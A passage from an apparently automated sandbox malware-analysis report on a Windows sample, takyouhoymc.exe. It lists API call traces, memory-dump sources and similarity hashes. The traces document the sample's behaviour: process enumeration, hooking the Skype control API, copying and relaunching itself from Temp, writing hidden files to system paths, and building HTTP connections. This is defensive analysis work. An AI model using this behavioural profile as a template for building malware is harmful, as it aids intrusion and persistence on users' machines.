                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Sleeplstrcatlstrcpy$EnumProcesses
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 1133451285-577769959
                                                                                                                                                                                                                                                      • Opcode ID: 375bf2c603975d94a3423e50868b9aad38ca831c325337d3e10432d8ebd3801c
                                                                                                                                                                                                                                                      • Instruction ID: 290fad04665f449d94154658a0f51bf0e2d2ddc89ee57f5f2291f851a3c36e9e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 375bf2c603975d94a3423e50868b9aad38ca831c325337d3e10432d8ebd3801c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 254194715083069BD704DF91D945A9E73E8FF88319F10082FF585A2082DB7CEA5E8B5B
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegisterWindowMessageA.USER32(SkypeControlAPIAttach), ref: 0041F2D5
                                                                                                                                                                                                                                                      • RegisterWindowMessageA.USER32(SkypeControlAPIDiscover), ref: 0041F2E1
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0041F2E8
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000), ref: 0041F2F2
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001F114,00000000,00000000,00000000), ref: 0041F31F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041F32F
                                                                                                                                                                                                                                                      • SendMessageTimeoutA.USER32(0000FFFF,00000000,00000000,000003E8,00000000), ref: 0041F352
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0041F39C
                                                                                                                                                                                                                                                        • Part of subcall function 0040C674: CloseHandle.KERNEL32(0041F3FB,00000000), ref: 0040C67A
                                                                                                                                                                                                                                                        • Part of subcall function 0040C674: ShellExecuteA.SHELL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\takyouhoymc.exe,00000001,00000000,00000001), ref: 0040C691
                                                                                                                                                                                                                                                        • Part of subcall function 0040C674: ExitProcess.KERNEL32 ref: 0040C699
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041F364
                                                                                                                                                                                                                                                        • Part of subcall function 004141E6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004141F4
                                                                                                                                                                                                                                                        • Part of subcall function 004141E6: Process32First.KERNEL32(00000000,?), ref: 00414213
                                                                                                                                                                                                                                                        • Part of subcall function 004141E6: CloseHandle.KERNEL32(00000000), ref: 00414239
                                                                                                                                                                                                                                                      • UnregisterClassA.USER32(0045B060), ref: 0041F3B1
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041F3BD
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000012,00000000,00000000), ref: 0041F3D7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$CloseHandleProcessSleep$CreateRegisterWindow$ClassCurrentExecuteExitFirstOpenPostProcess32SendShellSnapshotThreadTimeoutToolhelp32Unregister
                                                                                                                                                                                                                                                      • String ID: SkypeControlAPIAttach$SkypeControlAPIDiscover
                                                                                                                                                                                                                                                      • API String ID: 1681019911-3631024799
                                                                                                                                                                                                                                                      • Opcode ID: 8cfc4253ce46326dfd0062e342127bf3b29458d45f0f1fe5df60b82532e9d8d0
                                                                                                                                                                                                                                                      • Instruction ID: a09ccf61d67d2fbcfa244340a74f9e618c5262166e174269941f48430cf0e82b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cfc4253ce46326dfd0062e342127bf3b29458d45f0f1fe5df60b82532e9d8d0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04313971604348AFEB109B60EC85EBB3B6CE705746F50003BF914911E2CB788DDA8B6E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001,?,00000000,?,?,00420AA6,00000000,?,?,?,00000000), ref: 00414CB6
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001,?,?,00000000), ref: 00414CC1
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000001,?,?,00000000), ref: 00414CD5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00420AA6,?,00000000,?,?,00420AA6,00000000,?,?,?,00000000), ref: 00414CE0
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A440,?,?,00000000), ref: 00414CF6
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,?,?,00000000), ref: 00414CFA
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000000), ref: 00414D07
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001,?,?,00000000), ref: 00414D33
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001,?,?,00000000), ref: 00414D3A
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000001,?,?,00000000), ref: 00414D50
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,0042A440,?,?,00000000), ref: 00414D5C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,?,?,00000000), ref: 00414D60
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$lstrcat
                                                                                                                                                                                                                                                      • String ID: http:
                                                                                                                                                                                                                                                      • API String ID: 2983632679-838245522
                                                                                                                                                                                                                                                      • Opcode ID: f8fad10a29d5aa8471607020a499bbd3ab8de9879c4ae17ea2c307c24eef908b
                                                                                                                                                                                                                                                      • Instruction ID: 62fda144c49cf864dcc9d1f0225b2e0548f9b96ed26caa5c6ccefc40432326bd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8fad10a29d5aa8471607020a499bbd3ab8de9879c4ae17ea2c307c24eef908b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1031F5712042466BDB212BA5BC48BBB3B9C9F85714B64002BFD4182342EB5C9CD386BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll,0042C208,?,?,00000000,0042C278,00000008,00424DB3), ref: 0042816A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00428186
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00428197
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004281A4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 004281BA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004281CB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                      • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                                                                                                                                                                      • API String ID: 2238633743-752805172
                                                                                                                                                                                                                                                      • Opcode ID: c2cec2979fd55be9cd4a166be65f200ccb460f2b7fc8e12480f4fc6254f4e7c0
                                                                                                                                                                                                                                                      • Instruction ID: 72c22d4f7f03d427608bec40e611ae1e70230dce0bfe9de60929506030e41661
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2cec2979fd55be9cd4a166be65f200ccb460f2b7fc8e12480f4fc6254f4e7c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4219830B01765EAD7209FA4BC84B6F7AA89B45B41F90007FE500D6192EEB8D9119B7E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414381
                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 00414401
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000000,00000000,00000040), ref: 0041441C
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 00414425
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00414432
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041443B
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041443E
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00414441
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00414444
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00414447
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041444B
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 00414454
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$FocusForegroundShow$Rect$DesktopSleepText
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2116996943-0
                                                                                                                                                                                                                                                      • Opcode ID: 3346a8a576393b1a41f4106fb54133c9e2efe7628d2e634b27ad40588b9fa2c6
                                                                                                                                                                                                                                                      • Instruction ID: e68347bb96c8cbac91d85143463683f394961395708a3bbfd9651ea0f6597c63
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3346a8a576393b1a41f4106fb54133c9e2efe7628d2e634b27ad40588b9fa2c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1317271E0021DAFCB10DBB9CD88EDF7B79EB88310F144655F911A3254CA78A981CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76AE83C0,00000000), ref: 00410393
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004103A9
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: CloseHandle.KERNEL32(?), ref: 004103B2
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00410583
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 004105CC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004105DE
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004105EE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 00410637
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041064B
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0041062B
                                                                                                                                                                                                                                                      • C:\Windows\system32\, xrefs: 004104AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$FileHeap$CloseCreateDirectoryFreeHandleProcessReadWindows
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3549376159-2518840955
                                                                                                                                                                                                                                                      • Opcode ID: 6c34f9ac3773b0f6fb853ef0e1c898980aa2d83685e3e02c54b299e16f4abbe1
                                                                                                                                                                                                                                                      • Instruction ID: d72b5c0f04a7a801b5860cc1153d31a7b218ed3e87dac02d78eebbef0ee0db9c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c34f9ac3773b0f6fb853ef0e1c898980aa2d83685e3e02c54b299e16f4abbe1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC81E7B2D0021DABDF14DFA4CD859DEB7BCEB08304F1005A6E615E7241EB74AB858FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004107DA
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041081D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041084C
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 0041086B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0041087D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041088D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004107EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: SetFileAttributesA.KERNEL32(00000000,00000080,00000000,76AE8A60,?,?,?,004108D0,?,00000000,?), ref: 004106A5
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?,004108D0,?,00000000,?), ref: 004106B6
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: WriteFile.KERNEL32(00000000,?,004108D0,?,00000000,?,?,004108D0,?,00000000,?), ref: 004106D1
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: CloseHandle.KERNEL32(00000000,?,?,004108D0,?,00000000,?), ref: 004106D8
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: SetFileAttributesA.KERNEL32(00000000,00000002,?,?,004108D0,?,00000000,?), ref: 004106E3
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 004108AC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004108C0
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004108E1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004108A0
                                                                                                                                                                                                                                                      • C:\Windows\system32\, xrefs: 004107CE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$File$lstrcpy$AttributesHeap$AllocateCloseCountCreateDirectoryFolderFromHandleListLocationMallocPathProcessSpecialTickWindowsWritelstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 840702394-2518840955
                                                                                                                                                                                                                                                      • Opcode ID: 80a8e641399b6508dbf0078e983671f31f21b11afed267225c4bfad0ba8e470b
                                                                                                                                                                                                                                                      • Instruction ID: e59ea0402cc0a97aad8de641f098a8acb5b0e4b41f94063a684b31080ab07657
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a8e641399b6508dbf0078e983671f31f21b11afed267225c4bfad0ba8e470b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 885133B2C4021CBADB20EBA1DC89FDF777CAB55314F0445A7B505E2041EAB497D48FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001770,00000000,?,00000000,000003E8,?,00404494,?,?,00000000,00000000,?,?,?,00000000,00000002), ref: 0040E8C5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,http://,?,?,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040E8F7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E901
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040E90D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040E94C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E964
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E979
                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 0040E9B1
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040E690,00000000,00000000,?), ref: 0040EA64
